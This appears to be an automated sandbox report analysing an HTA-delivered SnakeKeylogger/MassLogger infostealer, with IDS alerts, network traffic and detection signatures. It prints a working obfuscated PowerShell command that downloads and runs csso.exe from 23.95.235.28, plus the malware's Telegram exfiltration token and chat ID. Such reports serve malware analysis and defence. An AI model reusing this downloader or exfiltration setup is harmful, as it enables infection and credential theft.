                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-13T01:18:55.217462+010020220511A Network Trojan was detected23.95.235.2880192.168.2.649694TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-13T01:19:03.185771+010028032742Potentially Bad Traffic192.168.2.649695158.101.44.24280TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\csso.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.nvufs
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exeAvira: detection malicious, Label: TR/AD.SnakeStealer.nvufs
                    Found malware configuration
                    Source: 00000007.00000002.2527369873.0000000002611000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exeReversingLabs: Detection: 70%
                    Source: C:\Users\user\AppData\Roaming\csso.exeReversingLabs: Detection: 70%
                    Multi AV Scanner detection for submitted file
                    Source: uhg.htaVirustotal: Detection: 33%Perma Link
                    Source: uhg.htaReversingLabs: Detection: 23%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49696 version: TLS 1.0
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.pdb source: powershell.exe, 00000003.00000002.1399001221.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: csso.exe, 00000006.00000003.1393345540.0000000003610000.00000004.00001000.00020000.00000000.sdmp, csso.exe, 00000006.00000003.1378138360.0000000003470000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: csso.exe, 00000006.00000003.1393345540.0000000003610000.00000004.00001000.00020000.00000000.sdmp, csso.exe, 00000006.00000003.1378138360.0000000003470000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0008445A
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008C6D1 FindFirstFileW,FindClose,6_2_0008C6D1
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0008C75C
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0008EF95
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0008F0F2
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0008F3F3
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_000837EF
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00083B12
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0008BCBC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02455782h7_2_02455358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 024551B9h7_2_02454F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02455782h7_2_024556AF

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 23.95.235.28:80 -> 192.168.2.6:49694
                    Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 23.95.235.28:80 -> 192.168.2.6:49694
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 00:18:54 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 12 Mar 2025 09:14:06 GMTETag: "eae00-63021a093dc5f"Accept-Ranges: bytesContent-Length: 962048Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4f 50 d1 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 cc 05 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 40 81 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 ac 25 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 25 02 00 00 70 0c 00 00 26 02 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 a0 0e 00 00 72 00 00 00 3c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 23.95.235.28 23.95.235.28
                    Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49695 -> 158.101.44.242:80
                    Source: global trafficHTTP traffic detected: GET /50/csso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49696 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_029D7A38 URLDownloadToFileW,3_2_029D7A38
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/csso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: powershell.exe, 00000003.00000002.1402683143.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1404410976.0000000007DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/50/csso.exe
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.000000000267E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: powershell.exe, 00000003.00000002.1404410976.0000000007E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.00000000026AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.00000000026AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1399001221.0000000004591000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1399001221.0000000004591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1396844309.00000000024CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com(x86)/AutoIt3/AutoItX/.0/Managed
                    Source: powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00094164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00094164
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00094164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00094164
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00093F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00093F66
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_0008001C
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_000ACABC

                    System Summary

                    barindex
                    Detected Cobalt Strike Beacon
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"Jump to behavior
                    Malicious sample detected (through community Yara rule)
                    Source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
